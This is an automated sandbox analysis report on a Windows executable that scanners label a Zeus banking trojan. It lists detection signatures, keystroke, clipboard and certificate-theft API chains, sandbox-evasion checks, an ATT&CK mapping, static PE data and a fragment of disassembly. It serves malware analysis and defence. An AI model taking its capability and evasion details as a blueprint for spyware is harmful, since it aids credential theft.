Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rd1Kf1A4cB.bin

Overview

General Information

Sample Name:Rd1Kf1A4cB.bin (renamed file extension from bin to exe)
Analysis ID:660113
MD5:0ad89e86b34a226ff2a3042103afc7f1
SHA1:91a27477c847ebf9ef3e2cb34e0bc93e323f449d
SHA256:f831d088c3a64b06843d970337f1c8877c9c1988d56720a7dee9d67efeaf78f0
Tags:exezitmo
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Found evasive API chain checking for process token information
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected potential crypto function
May initialize a security null descriptor
Contains functionality to launch a process as a different user
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Contains functionality to enumerate network shares
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Rd1Kf1A4cB.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\Rd1Kf1A4cB.exe" MD5: 0AD89E86B34A226FF2A3042103AFC7F1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Rd1Kf1A4cB.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: Rd1Kf1A4cB.exeVirustotal: Detection: 78%Perma Link
Source: Rd1Kf1A4cB.exeReversingLabs: Detection: 96%
Machine Learning detection for sample
Source: Rd1Kf1A4cB.exeJoe Sandbox ML: detected
Source: 0.2.Rd1Kf1A4cB.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00411780 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00411780

Compliance

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeUnpacked PE file: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack
Source: Rd1Kf1A4cB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00405838 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00405838
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00415B2D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_00415B2D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00415BE8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00415BE8
Source: Rd1Kf1A4cB.exe, Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.google.com/webhp
Source: Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.google.com/webhpbcsocksGlobal
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040CC5C InternetReadFile,0_2_0040CC5C
Source: Rd1Kf1A4cB.exe, 00000000.00000002.260413898.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040BB78 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,0_2_0040BB78
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040BCEA GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,0_2_0040BCEA
Source: Rd1Kf1A4cB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040F964 InitiateSystemShutdownExW,ExitWindowsEx,0_2_0040F964
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00404191 ExitWindowsEx,0_2_00404191
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00404392 CreateMutexW,ExitWindowsEx,OpenEventW,CloseHandle,SetEvent,CloseHandle,CloseHandle,OpenMutexW,GetFileAttributesExW,ReadProcessMemory,CloseHandle,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_00404392
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0041168D0_2_0041168D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00412FBB0_2_00412FBB
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00411D38 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,0_2_00411D38
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00404984 NtQueryInformationProcess,CloseHandle,NtCreateThread,0_2_00404984
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00404A40 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,0_2_00404A40
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_004063F7 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,TranslateMessage,GetClipboardData,PFXImportCertStore,0_2_004063F7
Source: Rd1Kf1A4cB.exeVirustotal: Detection: 78%
Source: Rd1Kf1A4cB.exeReversingLabs: Detection: 96%
Source: Rd1Kf1A4cB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00404D06 CloseHandle,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,GetLengthSid,CloseHandle,Process32NextW,CloseHandle,0_2_00404D06
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00411ADE GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_00411ADE
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040A15D CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_0040A15D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00409FE2 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,0_2_00409FE2
Source: classification engineClassification label: mal84.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00416937 CoCreateInstance,0_2_00416937

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeUnpacked PE file: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack .text:ER;.rdata:W;.rsrc:R; vs .text:ER;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeUnpacked PE file: 0.2.Rd1Kf1A4cB.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00405838 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00405838
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040FE5C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_0040FE5C

Malware Analysis System Evasion

barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-10443
Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-10795
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-10795
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-10466
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-10408
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-10294
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeAPI coverage: 2.0 %
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00415B2D FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_00415B2D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00415BE8 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00415BE8
Source: Rd1Kf1A4cB.exe, 00000000.00000002.260413898.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00414C0D mov edx, dword ptr fs:[00000030h]0_2_00414C0D
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00405838 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00405838
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00403A5D HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,GetLengthSid,GetCurrentProcessId,0_2_00403A5D
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00404B6E LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,lstrcmpiW,LeaveCriticalSection,0_2_00404B6E
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00413873 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,0_2_00413873
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00410542 GetTimeZoneInformation,0_2_00410542
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040F48A GetVersionExW,GetNativeSystemInfo,0_2_0040F48A
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_00406940 RegOpenKeyExW,GetLocalTime,0_2_00406940
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0040CEC4 GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,0_2_0040CEC4
Source: Rd1Kf1A4cB.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_0041369C HeapAlloc,socket,bind,closesocket,0_2_0041369C
Source: C:\Users\user\Desktop\Rd1Kf1A4cB.exeCode function: 0_2_004133AC socket,bind,listen,closesocket,0_2_004133AC

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Valid Accounts		23
Native API		1
Valid Accounts		1
Valid Accounts		1
Valid Accounts		21
Input Capture		1
Network Share Discovery		Remote Services21
Input Capture		Exfiltration Over Other Network Medium2
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
Access Token Manipulation		11
Access Token Manipulation		LSASS Memory2
System Time Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Install Root Certificate		Security Account Manager11
Security Software Discovery		SMB/Windows Admin Shares1
Clipboard Data		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)21
Software Packing		NTDS1
Process Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Account Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
System Information Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Rd1Kf1A4cB.exe78%VirustotalBrowse
Rd1Kf1A4cB.exe96%ReversingLabsWin32.Trojan.Zeus
Rd1Kf1A4cB.exe100%AviraTR/Crypt.XPACK.Gen
Rd1Kf1A4cB.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.Rd1Kf1A4cB.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File
0.2.Rd1Kf1A4cB.exe.590000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
0.0.Rd1Kf1A4cB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.google.com/webhpbcsocksGlobalRd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
    		high
    http://www.google.com/webhpRd1Kf1A4cB.exe, Rd1Kf1A4cB.exe, 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
      		high

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:660113
      Start date and time: 09/07/202204:01:112022-07-09 04:01:11 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 14s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Rd1Kf1A4cB.bin (renamed file extension from bin to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:27
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.evad.winEXE@1/0@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 99.3% (good quality ratio 91.3%)
      • Quality average: 83.3%
      • Quality standard deviation: 29.6%
      HCA Information:
      • Successful, ratio: 88%
      • Number of executed functions: 4
      • Number of non-executed functions: 107
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI

      Warnings

      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):7.50978452876486
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Rd1Kf1A4cB.exe
      File size:96256
      MD5:0ad89e86b34a226ff2a3042103afc7f1
      SHA1:91a27477c847ebf9ef3e2cb34e0bc93e323f449d
      SHA256:f831d088c3a64b06843d970337f1c8877c9c1988d56720a7dee9d67efeaf78f0
      SHA512:66149bae72c2c2cff1ce25b03c7f109ab64f8bc80fa22712836bf08843df37cf6e282e4a4776a33bf8c864f0dacb1b928ab44191cb49b65e1c3bad3e53b9d2f4
      SSDEEP:1536:uxDWt8Z1R4ayClVUbHTcM7Y62lO+5FZyoaGSMCDjTyF1ac9OtRHhmV:+Wt8ZIalVQzccKO+5FqBIItRAV
      TLSH:8693021941C6B4ABEAA44BF71BB5F117302413A14FB246E259A76E3FCF793CE0294349
      File Content Preview:MZ......................@...................................|...........!..L.!This program cannot be run in DOS mode....$...PE..L...%..L.....................d............... ....@.........................................................................dz.

      File Icon

      Icon Hash:00828e8e8686b000

      Static PE Info

      General

      Entrypoint:0x401cd0
      Entrypoint Section:.text
      Digitally signed:true
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:NO_SEH
      Time Stamp:0x4CAF0C25 [Fri Oct 8 12:18:45 2010 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:6ef02dd1adb61f4fee262f301b547fa3

      Authenticode Signature

      Signature Valid:
      Signature Issuer:
      Signature Validation Error:
      Error Number:
      Not Before, Not After
        Subject Chain
          Version:
          Thumbprint MD5:
          Thumbprint SHA-1:
          Thumbprint SHA-256:
          Serial:

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          sub esp, 000002A0h
          push ebx
          push esi
          push edi
          push ecx
          sub eax, ecx
          add dword ptr [ebp-000000B8h], eax
          sub dword ptr [ebp-000000BBh], eax
          mov edi, dword ptr [00402034h]
          lea eax, dword ptr [ebp-0Ch]
          push eax
          mov byte ptr [ebp-0Ch], 00000000h
          call edi
          xor eax, dword ptr [ebp-1Dh]
          mov dword ptr [ebp-1Fh], eax
          or dword ptr [ebp-1Fh], eax
          mov ebx, dword ptr [0040200Ch]
          call ebx
          test eax, eax
          jne 00007F03A4A2EA54h
          call ecx
          and dword ptr [ebp-00000171h], eax
          and dword ptr [ebp-000001D1h], eax
          lea ecx, dword ptr [ebp-6Ch]
          push ecx
          push FFFFFDF1h
          call dword ptr [00402030h]
          add esi, dword ptr [ebp-00000220h]
          or dword ptr [ebp-0000010Dh], eax
          call ebx
          test eax, eax
          jne 00007F03A4A2EA54h
          call esp
          or ebx, edi
          xor ebx, dword ptr [ebp-00000295h]
          push 0000000Fh
          push 00000000h
          call dword ptr [00402024h]
          test eax, eax
          jne 00007F03A4A2EA54h
          mov edx, dword ptr [edx]
          lea edx, dword ptr [ebp-01h]
          push edx
          mov byte ptr [ebp-01h], 00000000h
          call edi
          call 00007F03A4A2E14Dh
          test eax, eax
          je 00007F03A4A2EAA6h
          push 00000000h
          push 00000000h
          push 00000000h
          push 00000000h
          push 00000000h
          push 00000000h
          call dword ptr [00402020h]
          or ecx, dword ptr [ebp-2Bh]
          sub dword ptr [ebp-2Ch], eax
          lea eax, dword ptr [ebp-00000268h]
          push eax
          push FFFFFF23h
          call dword ptr [00402030h]
          sub edi, dword ptr [ebp+00000000h]

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x17a640x50.rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x280.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x20000x20.rdata
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x20480xac.rdata
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xe380x1000False0.58837890625data5.938180207293575IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .rdata0x20000x15c160x15e00False0.9077901785714285data7.598976363385786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x180000x60000x400False0.3388671875data3.245150535902098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_DIALOG0x180a00x6adataEnglishUnited States
          RT_MANIFEST0x181100x16aXML 1.0 document, ISO-8859 text, with CRLF line terminatorsEnglishUnited States

          Imports

          DLLImport
          KERNEL32GetProcAddress, GetCurrentThread, LoadLibraryA, LocalFree, GetSystemInfo, GetModuleHandleA, CompareStringA, LocalAlloc, CloseHandle
          USER32.dllBeginPaint, CharNextA, DispatchMessageA, GetMessageA, TranslateMessage
          ADVAPI32.dllRegCloseKey

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          No network behavior found

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:04:02:18
          Start date:09/07/2022
          Path:C:\Users\user\Desktop\Rd1Kf1A4cB.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\Rd1Kf1A4cB.exe"
          Imagebase:0x400000
          File size:96256 bytes
          MD5 hash:0AD89E86B34A226FF2A3042103AFC7F1
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low

          Disassembly

          Reset < >

            Execution Graph

            Execution Coverage:0.7%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:21.7%
            Total number of Nodes:696
            Total number of Limit Nodes:5
            execution_graph 10249 4046db 10262 403a5d 10249->10262 10252 4046f3 SetErrorMode GetCommandLineW CommandLineToArgvW 10254 404767 10252->10254 10261 40471a LocalFree 10252->10261 10253 40478c ExitProcess 10302 404392 10254->10302 10257 404760 10292 4041cd 10257->10292 10259 404765 10259->10253 10260 404781 Sleep 10259->10260 10261->10254 10261->10257 10263 403a76 10262->10263 10369 4035c8 10263->10369 10266 403a88 10266->10252 10266->10253 10267 403a8f HeapCreate 10268 403aa5 GetProcessHeap 10267->10268 10269 403ab8 10267->10269 10270 403abf InitializeCriticalSection WSAStartup 10268->10270 10269->10270 10378 4036e0 10270->10378 10272 403af4 10272->10266 10392 40375f 10272->10392 10275 403b04 10397 411a2c OpenProcessToken 10275->10397 10278 403b1d GetLengthSid 10279 403b37 10278->10279 10407 4037ad 10279->10407 10282 403b4c GetCurrentProcessId 10283 403b61 10282->10283 10284 403b66 10282->10284 10413 40380f 10283->10413 10284->10266 10417 403861 10284->10417 10290 403bc9 10290->10266 10293 40f369 10292->10293 10294 4041e1 GetModuleHandleW 10293->10294 10295 4041f4 10294->10295 10297 4041f0 10294->10297 10296 404202 GetProcAddress 10295->10296 10296->10297 10298 404212 10296->10298 10297->10259 10703 411220 10298->10703 10301 410418 HeapFree 10301->10297 10716 415750 CreateFileW 10302->10716 10305 4043e6 10306 4043f4 10305->10306 10307 4044ca 10305->10307 10734 405469 10306->10734 10310 4046c5 10307->10310 10793 403d00 10307->10793 10313 410418 HeapFree 10310->10313 10316 4046ce 10313->10316 10316->10259 10318 4046b4 10318->10310 10849 414a9d CharToOemW 10318->10849 10320 403cc5 StringFromGUID2 10322 4044fe OpenMutexW 10320->10322 10326 40454f IsWellKnownSid 10322->10326 10327 40451f CloseHandle 10322->10327 10324 404431 10324->10310 10748 4060a9 10324->10748 10325 40442c 10745 413a5e GetLastError 10325->10745 10330 404571 ReadProcessMemory 10326->10330 10331 404563 10326->10331 10329 404526 ReadProcessMemory 10327->10329 10332 404542 Sleep 10329->10332 10333 40453b 10329->10333 10335 404586 10330->10335 10336 4045e7 10330->10336 10799 405838 10331->10799 10332->10329 10333->10326 10333->10332 10335->10336 10340 40458d GetFileAttributesExW 10335->10340 10338 4168e8 2 API calls 10336->10338 10342 4045fb 10338->10342 10339 404568 10848 413a4e ReleaseMutex CloseHandle 10339->10848 10340->10336 10343 4045a3 10340->10343 10341 404452 10756 404d06 10341->10756 10831 4051b8 10342->10831 10827 